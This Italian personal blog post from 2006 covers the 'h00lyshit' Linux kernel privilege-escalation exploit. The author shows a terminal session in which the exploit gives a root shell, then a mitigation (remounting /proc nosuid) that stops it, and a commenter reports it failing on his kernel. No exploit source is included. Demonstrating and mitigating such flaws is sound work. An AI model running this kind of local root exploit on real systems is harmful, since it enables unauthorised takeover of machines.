Fabio Invernizzi

Crosta Manager

h00lyshit

Filed under: /me — fabio at 10:57 am on Tuesday, July 18, 2006

azz… me ne sto’ in ferie una settimana ed esce uno degli 0day peggiori degli ultimi tempi :-/

fabio@gnu:~$ ./h00lyshit /opt/movie/stallman/stallman_20050224.avi

preparing
trying to exploit /opt/movie/stallman/stallman_20050224.avi

sh-3.1# id
uid=0(root) gid=1000(fabio)
groups=4(adm),24(cdrom),29(audio),44(video),112(scard),1000(fabio),9904(grtpe)
sh-3.1# exit

FIX: (fino alla ricompilazione del kernel)

fabio@gnu:~$ sudo mount -o remount,nosuid /proc/
Password:
fabio@gnu:~$ ./h00lyshit /opt/movie/stallman/stallman_20050224.avi

preparing
trying to exploit /opt/movie/stallman/stallman_20050224.avi

sh-3.1$ id
uid=1000(fabio) gid=1000(fabio)
groups=4(adm),24(cdrom),29(audio),44(video),112(scard),1000(fabio),9904(grtpe)

Tags: hacking | Posted in /me |

1 Comment »

211

Comment by Emanù

18 July 2006 @ 11:51 pm

Strano: a me (con kernel Debian 2.6.17-1-k7) fallisce miseramente con:
emanuele@gnube:~$ ./h00lyshit /d2/video/SafeKiss.avi


preparing

trying to exploit /d2/video/SafeKiss.avi

mmap: Cannot allocate memory
… eppure i kernel vunerabili dovrebbero essere fino al 2.6.17.4! Mah!

RSS feed for comments on this post. TrackBack URI

/fabulus
Blogroll
Links
Calendario

July 2006

M T W T F S S

« Jun Aug »

1 2

3 4 5 6 7 8 9

10 11 12 13 14 15 16

17 18 19 20 21 22 23

24 25 26 27 28 29 30

31
Archives

/fabulus talks about him and his hacks…

Crosta Manager

h00lyshit

1 Comment »

Leave a comment

/fabulus

Blogroll

Links

Calendario

Archives

July 2006
M	T	W	T	F	S	S
« Jun				Aug »
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30
31